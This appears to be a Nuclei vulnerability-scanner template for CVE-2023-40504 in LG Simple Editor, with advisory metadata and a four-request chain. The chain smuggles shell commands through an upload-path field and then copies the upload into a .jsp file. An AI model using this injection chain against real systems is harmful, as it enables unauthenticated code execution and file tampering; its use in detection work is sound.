id: CVE-2023-40504 info: name: LG Simple Editor <= v3.21.0 - Command Injection author: s4e-io severity: critical description: | LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. reference: - https://www.zerodayinitiative.com/advisories/ZDI-23-1208/ - https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html - https://0day.today/exploit/39719 - https://www.usom.gov.tr/bildirim/tr-24-0417 - https://nvd.nist.gov/vuln/detail/CVE-2023-40504 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-40504 cwe-id: CWE-78 epss-score: 0.00094 epss-percentile: 0.40471 metadata: max-request: 1 verified: true vendor: lg product: simple_editor fofa-query: icon_hash="159985907" tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload variables: filename: "{{rand_base(12)}}" flow: http(1) && http(2) && http(3) && http(4) http: - raw: - | GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"LG Simple Editor")' - 'status_code == 200' condition: and internal: true - raw: - | POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadVideo"; filename="{{filename}}.bmp" / ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadPath" /"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../" ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadFile_x" 1 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadFile_width" 1 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="uploadFile_height" 1 ------WebKitFormBoundary7MA4YWxkTrZu0gW-- matchers: - type: dsl dsl: - 'contains_all(body, "errorCode","errorMessage","fail")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and internal: true - raw: - | POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept: application/json {"command":"cp","option":"-f","srcPath":"/{{filename}}_original.bmp","destPath":"/{{filename}}.jsp"} matchers: - type: dsl dsl: - 'contains_all(body, "errorCode","errorMessage","data","success")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and internal: true - raw: - | GET /simpleeditor/{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 490a004630440220238d6c4b173876bdd11be552ce064e6ea86a408459fccc901d1529e02d5a73ec0220099ad07f51609f948f410c4293a172cb6831ca2f0b359658c9a5f62714ae552e:922c64590222798bb761d5b6d8e72950